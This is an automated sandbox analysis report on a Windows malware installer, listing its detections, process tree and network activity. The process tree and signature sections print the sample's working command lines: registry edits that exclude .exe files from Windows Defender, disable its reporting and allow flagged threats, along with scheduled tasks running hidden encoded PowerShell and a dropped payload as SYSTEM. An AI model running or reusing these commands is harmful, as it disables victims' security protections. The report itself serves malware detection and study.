Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:753408
MD5:e99e15a440798e20c682eb859b3f7885
SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5428 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
    • Install.exe (PID: 2620 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
      • Install.exe (PID: 3408 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
        • forfiles.exe (PID: 5112 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5704 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 5752 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4644 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5640 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5696 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 3128 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
              • Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • reg.exe (PID: 1412 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 5792 cmdline: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5992 cmdline: schtasks /run /I /tn "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2068 cmdline: schtasks /DELETE /F /TN "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1920 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6060 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 2108 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • gpscript.exe (PID: 5816 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • pdyDoIJ.exe (PID: 2384 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
    • powershell.exe (PID: 3560 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 496 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 3520 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2416 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2064 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4552 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5128 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5268 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5248 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5376 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5556 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5532 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5576 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, ParentProcessId: 3408, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 5792, ProcessName: schtasks.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 39%
Multi AV Scanner detection for domain / URL
Source: service-domain.xyzVirustotal: Detection: 11%Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exeReversingLabs: Detection: 51%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\Jump to behavior

Networking

barindex
Performs DNS queries to domains with low reputation
Source: DNS query: service-domain.xyz
Source: powershell.exe, 00000011.00000002.412093333.000001A8F98D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.440371614.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknownDNS traffic detected: queries for: service-domain.xyz

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: Commandline size = 3260Jump to behavior
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicykaNvHJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162A60_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E5A50_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004126B00_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A010_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EF10_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418FCB0_2_00418FCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02E4C23838_2_02E4C238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02E4C2C338_2_02E4C2C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02E4C30038_2_02E4C300
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02E4F2B838_2_02E4F2B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0626972038_2_06269720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627907838_2_06279078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627E04938_2_0627E049
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627E05838_2_0627E058
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627907838_2_06279078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627000638_2_06270006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_0627004038_2_06270040
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000000.00000000.246681681.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe 8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: file.exeReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
